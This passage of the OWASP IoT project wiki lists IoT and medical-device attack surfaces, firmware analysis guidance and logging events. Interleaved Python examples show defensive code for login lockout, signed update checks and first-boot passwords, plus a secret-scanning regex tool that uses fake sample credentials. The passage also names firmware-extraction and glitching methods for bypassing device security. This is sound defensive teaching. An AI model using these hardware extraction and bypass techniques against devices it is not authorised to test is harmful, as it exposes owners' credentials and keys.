| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|}<br />
<br />
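The first three rows of the table above (username enumeration, weak passwords, account lockout) describe what a device's login handler has to prevent: the authentication mechanism must not reveal which usernames exist, must refuse guessable values such as '1234' or '123456', and must stop accepting attempts after a handful of failures. The Python below is an added example, not code from the OWASP project or any of its sub-projects; the `AuthStore` class, its constants, the weak-password list and the injectable clock are all hypothetical choices made for illustration.<br />

```python
"""Added example (not OWASP project code): a login handler that addresses
username enumeration, weak passwords and missing account lockout together."""
import hashlib
import hmac
import os
import time

MAX_FAILED_ATTEMPTS = 5       # the table cites 3-5 failures as the lockout threshold
LOCKOUT_SECONDS = 15 * 60     # hypothetical lockout window
MIN_PASSWORD_LENGTH = 8       # hypothetical minimum
PBKDF2_ITERATIONS = 100_000   # hypothetical work factor
# Constructed sample of guessable/default values of the kind the table names.
WEAK_PASSWORDS = {"1234", "123456", "12345678", "password", "admin", "root"}


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest


class AuthStore:
    def __init__(self, now=time.monotonic):
        self._now = now                 # injectable clock so lockout expiry is testable
        self._users = {}                # username -> (salt, digest)
        self._failures = {}             # username -> (failed_count, locked_until)
        # Decoy credential: unknown usernames cost one PBKDF2 run, same as known
        # ones, so response time does not reveal whether the account exists.
        self._decoy = hash_password(os.urandom(16).hex())

    def is_weak_password(self, password):
        """Reject short passwords and anything on the constructed weak list."""
        return len(password) < MIN_PASSWORD_LENGTH or password.lower() in WEAK_PASSWORDS

    def register(self, username, password):
        if self.is_weak_password(password):
            raise ValueError("password is too short or on the weak-password list")
        self._users[username] = hash_password(password)

    def is_locked(self, username):
        return self._failures.get(username, (0, 0.0))[1] > self._now()

    def login(self, username, password):
        """Return True on success, False otherwise.

        Every failure path returns the same value, and the same hashing work
        is done whether or not the username exists, so the caller learns
        nothing about which usernames are valid. Failure counters are kept
        for unknown usernames too; in a real device they need an eviction
        policy so a flood of random names cannot exhaust memory."""
        count, locked_until = self._failures.get(username, (0, 0.0))
        now = self._now()
        if locked_until > now:
            return False                # locked: indistinguishable from a bad password
        salt, stored = self._users.get(username, self._decoy)
        _, candidate = hash_password(password, salt)
        # Constant-time compare; the membership test runs after the hash work.
        matched = hmac.compare_digest(candidate, stored) and username in self._users
        if matched:
            self._failures.pop(username, None)
            return True
        count += 1
        if count >= MAX_FAILED_ATTEMPTS:
            self._failures[username] = (0, now + LOCKOUT_SECONDS)
        else:
            self._failures[username] = (count, 0.0)
        return False


if __name__ == "__main__":
    store = AuthStore()
    store.register("operator", "correct horse battery")
    print("good login:", store.login("operator", "correct horse battery"))
    for _ in range(MAX_FAILED_ATTEMPTS):
        store.login("operator", "guess")
    print("locked after repeated failures:", store.is_locked("operator"))
```

The decoy hash is the part most often skipped in device firmware: without it, a login for a non-existent user returns faster than one for a real user with a wrong password, and the timing difference is enough to enumerate accounts even when the error message is identical.<br />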
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
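Several rows above (the update-mechanism items, "Reuse of session key, token, etc.", "Lack of dynamic authentication") come down to one device-side rule: do not install or act on anything until its authenticity, integrity and freshness have been verified. The Python below is added here as an illustration and is not part of the OWASP project; it shows that rule for a firmware update: a vendor-signed manifest carrying the image hash and a monotonic version, and a device routine that rejects a tampered image, a forged manifest, a replayed update and a downgrade. The key handling is an assumption: HMAC-SHA256 with a device-provisioned key is used so the code runs on the standard library alone, where a real design verifies an asymmetric signature against a public key baked into the device.<br />

```python
"""Firmware update verification: authenticity, integrity and anti-rollback.

Added example, not OWASP project code. HMAC-SHA256 stands in for the
vendor signature so the example runs with the standard library alone.
"""
import hashlib
import hmac
import json

# ASSUMPTION: a key provisioned into the device at manufacture. A production
# design ships only the vendor's *public* key on the device and verifies an
# asymmetric signature (e.g. Ed25519), so dumping one unit's flash never
# yields the ability to sign updates for the whole fleet.
VENDOR_KEY = hashlib.sha256(b"example vendor key - not a real secret").digest()


def _canonical(manifest: dict) -> bytes:
    # Deterministic serialisation: the MAC must cover exactly the bytes the
    # device later parses, leaving no room for field-reordering tricks.
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def _mac(manifest: dict, key: bytes) -> str:
    return hmac.new(key, _canonical(manifest), hashlib.sha256).hexdigest()


def build_update(payload: bytes, version: int, key: bytes = VENDOR_KEY) -> dict:
    """Vendor side: wrap a firmware image in a signed manifest."""
    manifest = {
        "version": version,
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
    }
    return {"manifest": manifest, "sig": _mac(manifest, key), "payload": payload}


class UpdateRejected(Exception):
    pass


def verify_update(update: dict, installed_version: int, key: bytes = VENDOR_KEY) -> int:
    """Device side: return the version to install, or raise UpdateRejected.

    Order matters: nothing inside the manifest (version, size, hash) is
    trusted until the MAC over the manifest has been checked.
    """
    manifest, sig, payload = update["manifest"], update["sig"], update["payload"]
    if not hmac.compare_digest(_mac(manifest, key), sig):
        raise UpdateRejected("bad-signature")
    # Anti-rollback: a genuine but older (or identical) image is a replay.
    if manifest["version"] <= installed_version:
        raise UpdateRejected("rollback")
    if len(payload) != manifest["size"]:
        raise UpdateRejected("size-mismatch")
    digest = hashlib.sha256(payload).hexdigest()
    if not hmac.compare_digest(digest, manifest["sha256"]):
        raise UpdateRejected("hash-mismatch")
    return manifest["version"]


def attempt(update: dict, installed_version: int) -> tuple:
    """('ok', version) or ('rejected', reason)."""
    try:
        return ("ok", verify_update(update, installed_version))
    except UpdateRejected as exc:
        return ("rejected", str(exc))


def run_scenarios() -> dict:
    """Constructed scenarios: one legitimate update and four attacks."""
    good = build_update(b"firmware image v2 (constructed)", 2)
    # Same length, one byte changed: only the hash check can catch this.
    tampered_payload = dict(good, payload=good["payload"][:-1] + b"X")
    # Attacker bumps the version field without being able to re-sign.
    forged_version = dict(good, manifest=dict(good["manifest"], version=3))
    return {
        "good_over_v1": attempt(good, 1),
        "tampered_payload": attempt(tampered_payload, 1),
        "forged_version": attempt(forged_version, 1),
        "replay_same_version": attempt(good, 2),
        "downgrade_to_v1": attempt(build_update(b"old image v1", 1), 2),
    }


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name:20s} -> {result}")
```

Running the file prints the outcome of each scenario. The ordering of the checks is the security-relevant point: the version and hash fields are only read after the MAC over the manifest has passed, so an attacker who can edit the manifest gains nothing, and the monotonic version comparison is what turns "Updates not signed", "Replay attack" and "Firmware downgrade possibility" into a single rule on the device.<br />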
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS protocol versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}{{Social Media Links}} <br />
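Three of the manufacturer recommendations above (no hardcoded admin passwords, a user-chosen admin password during initial setup, strong hashing) can be met by a single first-boot routine. The Python below is an added example, not code from the Firmware Analysis Project: the admin interface stays disabled until a password has been set, the candidate is checked against a denylist of factory defaults and against the device serial, only a salted scrypt digest is stored, and a failure counter locks the account. The denylist, the length limit and the lockout threshold are assumptions chosen for the demo.<br />

```python
"""First-boot admin password setup for an IoT device.

Added example, not OWASP project code. Demonstrates: no admin surface until
a password exists, rejection of factory defaults, salted scrypt storage,
constant-time verification and a lockout counter.
"""
import hashlib
import hmac
import secrets
from typing import Optional

# ASSUMPTIONS for the demo: denylist, minimum length and lockout threshold.
DEFAULT_DENYLIST = {"admin", "password", "1234", "12345678", "root",
                    "default", "support", "guest"}
MIN_LENGTH = 12
MAX_FAILURES = 5


class AdminCredential:
    """Holds only a salt and an scrypt digest, never the password itself."""

    def __init__(self) -> None:
        self.salt: Optional[bytes] = None
        self.digest: Optional[bytes] = None
        self.failures = 0

    @property
    def provisioned(self) -> bool:
        return self.digest is not None

    @property
    def locked(self) -> bool:
        return self.failures >= MAX_FAILURES


def _derive(password: str, salt: bytes) -> bytes:
    # Memory-hard KDF from the standard library; n/r/p cost ~16 MiB per check,
    # which slows offline cracking if the flash is ever dumped.
    return hashlib.scrypt(password.encode("utf-8"), salt=salt,
                          n=2 ** 14, r=8, p=1, dklen=32)


def check_policy(password: str, serial: str) -> Optional[str]:
    """Return a rejection reason, or None if the password is acceptable."""
    if password.lower() in DEFAULT_DENYLIST:
        return "default-or-common"
    if len(password) < MIN_LENGTH:
        return "too-short"
    if serial and serial.lower() in password.lower():
        return "contains-serial"   # the serial is printed on the label
    return None


def set_initial_password(cred: AdminCredential, password: str, serial: str) -> Optional[str]:
    """First-boot step; returns None on success or the policy failure reason."""
    if cred.provisioned:
        return "already-provisioned"   # later changes go through an authenticated path
    reason = check_policy(password, serial)
    if reason:
        return reason
    cred.salt = secrets.token_bytes(16)
    cred.digest = _derive(password, cred.salt)
    return None


def admin_services_enabled(cred: AdminCredential) -> bool:
    """The web/SSH admin interface is not started until a real password exists."""
    return cred.provisioned


def authenticate(cred: AdminCredential, password: str) -> str:
    if not cred.provisioned:
        return "not-provisioned"
    if cred.locked:
        return "locked"
    if hmac.compare_digest(_derive(password, cred.salt), cred.digest):
        cred.failures = 0
        return "ok"
    cred.failures += 1
    return "locked" if cred.locked else "bad-password"


def run_scenario() -> dict:
    """Constructed first-boot walk-through."""
    cred, serial = AdminCredential(), "SN-2019-000123"
    out = {"services_before": admin_services_enabled(cred)}
    out["reject_default"] = set_initial_password(cred, "admin", serial)
    out["reject_short"] = set_initial_password(cred, "Abc123!", serial)
    out["reject_serial"] = set_initial_password(cred, "sn-2019-000123-xyz!", serial)
    out["accept"] = set_initial_password(cred, "correct horse battery staple 7!", serial)
    out["services_after"] = admin_services_enabled(cred)
    out["wrong_attempts"] = [authenticate(cred, "admin") for _ in range(MAX_FAILURES)]
    out["right_but_locked"] = authenticate(cred, "correct horse battery staple 7!")
    return out


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key:18s} -> {value}")
```

The same structure covers the "Known default credentials", "Weak passwords" and "Account lockout" items that recur in the web, mobile and firmware attack-surface lists: there is no vendor-wide default to know, and the stored digest is salted per device, so a hash recovered from one unit's firmware does not open another.<br />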
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
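For the "searching a file system for sensitive or interesting data" step, here is an added Python example (not the project's own tooling; Firmwalker covers similar ground in shell) that walks an extracted root filesystem and flags the Device Firmware issues listed in the left column: baked-in or weak password hashes in /etc/passwd and /etc/shadow, a second UID-0 account, PEM private keys, credential assignments in config files, and URLs with embedded credentials. The sample tree it builds in a temporary directory is constructed for the demo and is not taken from any real firmware.<br />

```python
"""Scan an extracted firmware root filesystem for secrets and backdoor accounts.

Added example, not the project's own tooling. The sample tree below is
constructed for the demo; point scan_rootfs() at a real `binwalk -e` output.
"""
import os
import re
import shutil
import tempfile
from typing import List, Tuple

Finding = Tuple[str, str, str]  # (kind, path relative to rootfs, detail)

PRIVATE_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
CRED_ASSIGN_RE = re.compile(
    rb"\b(?:passw(?:or)?d|secret|api[_-]?key|token)\s*[=:]\s*\S+", re.IGNORECASE)
CRED_IN_URL_RE = re.compile(rb"\b[a-z][a-z0-9+.-]*://[^\s/:@]+:[^\s/@]+@\S+", re.IGNORECASE)
SKIP_DIRS = {"proc", "sys", "dev"}
MAX_FILE_BYTES = 4 * 1024 * 1024  # skip large blobs (kernel, nested squashfs)


def scan_passwd_like(rel: str, data: bytes) -> List[Finding]:
    """Parse /etc/passwd or /etc/shadow lines of the form user:hash:..."""
    findings: List[Finding] = []
    for line in data.splitlines():
        parts = line.split(b":")
        if len(parts) < 2 or not parts[0]:
            continue
        user, pw = parts[0].decode(errors="replace"), parts[1]
        if rel == "etc/passwd" and len(parts) > 2 and parts[2] == b"0" and user != "root":
            findings.append(("extra-uid0-account", rel, user))   # classic backdoor
        if pw == b"":
            findings.append(("empty-password", rel, user))
        elif pw == b"x" or pw.startswith((b"*", b"!")):
            continue  # shadowed or locked: nothing baked in here
        elif pw.startswith(b"$1$") or not pw.startswith(b"$"):
            findings.append(("weak-hash", rel, user))            # md5-crypt or DES crypt
        else:
            findings.append(("baked-in-hash", rel, user))        # same hash on every unit
    return findings


def scan_rootfs(root: str) -> List[Finding]:
    """Walk an extracted root and collect findings, sorted for stable output."""
    findings: List[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or os.path.getsize(full) > MAX_FILE_BYTES:
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                data = fh.read()
            if rel in ("etc/passwd", "etc/shadow"):
                findings += scan_passwd_like(rel, data)
            if PRIVATE_KEY_RE.search(data):
                findings.append(("private-key", rel, ""))
            for m in CRED_ASSIGN_RE.finditer(data):
                findings.append(("hardcoded-credential", rel, m.group(0).decode(errors="replace")))
            for m in CRED_IN_URL_RE.finditer(data):
                findings.append(("credential-in-url", rel, m.group(0).decode(errors="replace")))
    return sorted(findings)


def build_sample_rootfs() -> str:
    """Constructed stand-in for an extracted firmware tree (NOT a real image)."""
    root = tempfile.mkdtemp(prefix="rootfs-")
    files = {
        "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n"
                      b"support:$1$aa$deadbeefdeadbeefdeadbe:0:0:vendor:/:/bin/sh\n",
        "etc/shadow": b"root:$6$salt$constructedhashvalue:17000:0:99999:7:::\n"
                      b"admin::17000:0:99999:7:::\n",
        "etc/ssl/device.key": b"-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructed\n-----END RSA PRIVATE KEY-----\n",
        "etc/config/cloud.conf": b"api_key = AKIA-CONSTRUCTED-0000\n"
                                 b"upload = https://svc:Passw0rd@api.example.test/v1\n",
        "usr/bin/health.sh": b"#!/bin/sh\ncurl -s http://updates.example.test/check\n",  # benign
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


def scan_sample() -> List[Finding]:
    root = build_sample_rootfs()
    try:
        return scan_rootfs(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for kind, rel, detail in scan_sample():
        print(f"{kind:22s} {rel:24s} {detail}")
```

Two findings deserve a note. A hash in /etc/shadow is reported even when it is a modern sha-crypt, because a hash that is identical on every shipped unit is crackable offline once and reused everywhere; and a second UID-0 entry in /etc/passwd is reported regardless of its hash, since that is the usual shape of a vendor "support" backdoor. The benign health.sh URL is included to show that the credential-in-URL pattern does not fire on ordinary endpoints.<br />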
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
